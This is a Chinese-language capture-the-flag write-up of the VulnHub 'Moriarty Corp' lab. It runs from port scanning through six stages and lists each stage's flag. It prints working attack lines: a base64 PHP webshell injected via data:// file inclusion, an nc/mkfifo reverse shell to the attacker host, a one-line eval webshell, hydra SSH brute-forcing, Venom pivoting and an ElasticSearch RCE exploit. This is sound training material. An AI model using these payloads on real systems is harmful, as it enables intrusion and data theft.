Overview| Name | Template |

| — | — |
| Release Date | 2024-11-09 |
| Write-up Author | kill3r |
| Machine Author | kill3r |
| Difficulty | Medium |
| User Flag | |
| Root Flag | |
| Link | https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/ |

描述- 作为一名特工,协助调查世界最大军火商的非法交易!

  • 靶场共分6个任务,每完成一个任务并提交Flag,开启下一个任务
  • Web面板位于端口8000(不在范围内。请勿攻击)
  • 标志以#_flag.txt格式存储。标志以 flag{} 格式输入。它们通常存储在 / 目录中,但可以位于不同的位置。
  • 当您添加标志时,Web 应用程序会在后台启动 docker 容器。关闭并重新启动会弄乱它。
    涉及的任务:
  • 端口扫描
  • webapp 攻击和 bug 搜寻
  • 旋转(强烈推荐meterpreter)
  • 密码猜测/暴力破解

相关技能1. 文件包含

  1. 隧道代理 venom/ew
  2. 文件上传
  3. 哈希碰撞
  4. 逻辑漏洞

Nmap扫描```bash

ports=$(nmap -p- –min-rate=1000 -T4 192.168.56.100 | grep -oE ‘(^[0-9][^/tcp]*)’ | tr ‘\n’ ‘,’)
nmap -p$ports -sV -sC -O 192.168.56.100 -oN nmap.txt

第一行代码使用nmap命令扫描本地主机的所有端口(从1到65535),–min-rate=1000参数表示每秒发送最少1000个包,-T4参数表示设置扫描速度为快速扫描模式。

grep -oE ‘(^[0-9][^/tcp]*)’用于提取输出结果中的端口号,tr ‘\n’ ‘,’用于将提取的端口号按逗号分隔并拼接成一个字符串。

第二行代码使用nmap命令再次扫描指定的端口,-p$ports参数表示扫描之前提取的端口列表,-sV参数表示进行服务版本检测,-sC参数表示在扫描过程中使用默认脚本进行常见漏洞探测,-O参数表示进行操作系统版本检测,-oN nmap.txt参数表示将扫描结果保存到名为nmap.txt的文件中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.100 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.56.100 -oN nmap.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 10:01 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.104
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:a7:c8:64:2a:54:bc:64:48:16:2b:79:64:69:cc:45 (RSA)
| 256 89:8d:6a:9b:44:e3:f1:f1:ef:8c:23:13:7a:84:fc:71 (ECDSA)
|_ 256 1d:e6:68:27:52:5b:6d:0d:67:5d:30:4c:03:68:b3:2a (ED25519)
8000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
9000/tcp open http Portainer Docker UI 1.19.2
|_http-title: Portainer
MAC Address: 08:00:27:C8:E8:21 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.56.104
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds

枚举### SMB 枚举> Port: 139 389 445 636

  • enum4linux -a/-A 127.0.0.1
1
$ enum4linux -A <ip>
  • MSF-SMB
1
2
3
4
5
6
# 基于SMB协议扫描版本号
msf6 > use auxiliary/scanner/smb/smb_version
# 扫描共享文件
msf6 > use auxiliary/scanner/smb/smb_enumshares
# 基于SMB进行用户信息枚举
msf6 > use auxiliary/scanner/smb/smb_lookupsid

Web> HTTP Web Server, Port Like: 80 443 81 8080 8443 4443 8081

  • Finger:获取有关特定用户或系统上的用户列表和配置信息

`whatweb````bash

用于识别和分析目标网站的技术栈、CMS(内容管理系统)、插件、框架和其他与网站相关的信息。通过分析网站的响应和页面内容

┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.56.100
http://192.168.56.100 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.56.100], Script[text/javascript]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
- 目录枚举
`dirb http://192.168.56.100`
`dirsearch -u http://192.168.56.100 -r`
`gobuster dir -w ... -u http://192.168.56.100 -x html,php,js,bak`
```bash
┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.56.100 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.100
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,js,bak
[+] Timeout: 10s
===============================================================
2023/08/03 22:01:51 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 1620]
/profile.php (Status: 200) [Size: 1473]
/javascript.js (Status: 200) [Size: 0]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/exploit.html (Status: 200) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1099312 / 1102805 (99.68%)===============================================================
2023/08/03 22:03:22 Finished
===============================================================
  • 漏洞扫描
1
2
$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/

复现过程在8000端口输入flag{start}开启关卡

关卡一

访问80端口
两个页面只有文件名不同,下意识文件包含Kali监听nc -lvvp 6666

1
2
# 文件包含中data协议直接反弹shell
data%3A//text/plain%3Bbase64%2CPD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7Pz4%3D&cmd=rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f%7C/bin/sh+2>%261%7Cnc+192.168.56.102+6666+%3E/tmp/f
1
2
3
id
cd /
cat 1_flag.txt
1
flag{the_game_is_on}

提交第一关Flag进行下一关

关卡二

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# ls
admin.exe admin_linux_x86 agent_arm_eabi5 agent_linux_x64 agent_macos_x64 changelog
admin_linux_x64 admin_macos_x64 agent.exe agent_linux_x86 agent_mipsel_version1 scripts
┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
# 靶机
cd /tmp
wget http://192.168.56.102/agent_linux_x64
chmod +x agent_linux_x64
# attack
┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# chmod +x admin_linux_x64
┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# ./admin_linux_x64 -lport 9999
# 靶机
./agent_linux_x64 -rhost 192.168.56.102 -rport 9999
2023/09/09 08:43:12 [+]Successfully connects to a new node
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
(admin node) >>> show
A
+ -- 1
(admin node) >>> (admin node) >>> goto 1
node 1
(node 1) >>> socks 9090
a socks5 proxy of the target node has started up on the local port 9090.
# 使用proxychains4
vim /etc/proxychains4.conf
socks5 127.0.0.1 9090
┌──(root㉿kill3r)-[/opt/lan]
└─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p80
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 17:21 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.1:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.2:80 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.3:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.4:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.7:80 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.10:80 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.13:80 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.16:80

发现了172.17.0.4:80使用代理打开浏览器proxychains4 firefox访问
发现需要密码,那就是用Burp爆破,但是浏览器设置了burp的代理端口就无法设置,socks,所以我们可以使用burp的二级代理模式
正常使用,此时使用一句话木马<?php @eval($_POST['a']);?>选择webshell,然后随便输入一个密码点击拦截后提交,
发送到爆破模块,对密码设置变量,选中一个字典后开始攻击
蚁剑设置代理
拿到flag

1
flag{picture_is_worth_1000_words}

关卡三(HASH碰撞)

发现一堆账号和加密后的密码,密码像是md5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kill3r)-[/home/kill3r]
└─# hash-identifier 63a9f0ea7bb98050796b649e85481845
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

发现是MD5,使用在线网站破解

1
2
3
4
5
6
7
8
9
10
root
toor
password
admin
guest
MORIARTY
MCORP
mcorp
weapons
moriarty

把账号和密码分别写到txt中,扫描开放22端口的机器,并使用hydra暴力破解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p22
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 19:05 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.1:22 ... OK
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.2:22 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.3:22 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.4:22 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.5:22 ... OK
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 hydra -L admin -P password 172.17.0.5 ssh
1
2
3
[22][ssh] host: 172.17.0.5 login: root password: weapons
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 ssh root@172.17.0.5
1
flag{what_weapons}

关卡四

账号密码告诉我们了,提示可能在这几个端口上,那么重点扫描这几个端口

1
2
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p443,8000,8080,8888

扫了半年可算扫完了
输入账号密码
好像是一个聊天室,有聊天和修改密码功能
发现一个用户:admin,接着查看修改密码功能看看有没有任意密码修改
盲猜没有进行鉴权,把usernaem改成admin试一下,好像成功了,用无痕登录一下
登录成功,并且发现flag

1
flag{on_the_move}

关卡五

提示我们有一个Elasticsearch

1
2
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p9200
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
# 版本1.4.2
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# searchsploit elasticsearch
-------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path
-------------------------------------------------------------------------------------------------------- ---------------------------------
ElasticSearch - Remote Code Execution | linux/remote/36337.py
ElasticSearch - Remote Code Execution | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit) | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit) | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump | multiple/webapps/50152.py
-------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
Papers: No Results
# 先尝试RCE
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# searchsploit elasticsearch -m 36337.py
[!] Could not find EDB-ID #
Exploit: ElasticSearch - Remote Code Execution
URL: https://www.exploit-db.com/exploits/36337
Path: /usr/share/exploitdb/exploits/linux/remote/36337.py
Codes: CVE-2015-1427, OSVDB-118239
Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /opt/vulnhub/MoriartyCorp/36337.py
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# python2 36337.py
▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██░ ██ ▓█████ ██▓ ██▓
▓█ ▀ ▓██▒ ▒████▄ ▒██ ▒ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒
▒███ ▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒ ▓██░ ▒░▒██▒▒▓█ ▄ ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░
▒▓█ ▄ ▒██░ ░██▄▄▄▄██ ▒ ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░
░▒████▒░██████▒▓█ ▓██▒▒██████▒▒ ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░░ ▒░ ░░ ▒░▓ ░▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░ ░▓ ░ ░▒ ▒ ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░
░ ░ ░░ ░ ▒ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ░ ░ ▒ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░
░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░

Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
Use: 36337.py target
# 直接跟IP地址即可
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 python2 36337.py 172.17.0.7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██░ ██ ▓█████ ██▓ ██▓
▓█ ▀ ▓██▒ ▒████▄ ▒██ ▒ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒
▒███ ▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒ ▓██░ ▒░▒██▒▒▓█ ▄ ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░
▒▓█ ▄ ▒██░ ░██▄▄▄▄██ ▒ ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░
░▒████▒░██████▒▓█ ▓██▒▒██████▒▒ ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░░ ▒░ ░░ ▒░▓ ░▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░ ░▓ ░ ░▒ ▒ ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░
░ ░ ░░ ░ ▒ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ░ ░ ▒ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░
░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░

Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.7:9200 ... OK
6_flag.txt
bin
boot
buyers.txt
dev
elasticsearch
elasticsearch-1.4.2.tar.gz
etc
home
lib
lib64
main.sh
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
~$ cat 6_flag.txt
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.7:9200 ... OK
flag{game_over}
~$

结束

许可协议

本文由 kill3r 原创,采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。

分享文章

快来参与讨论吧~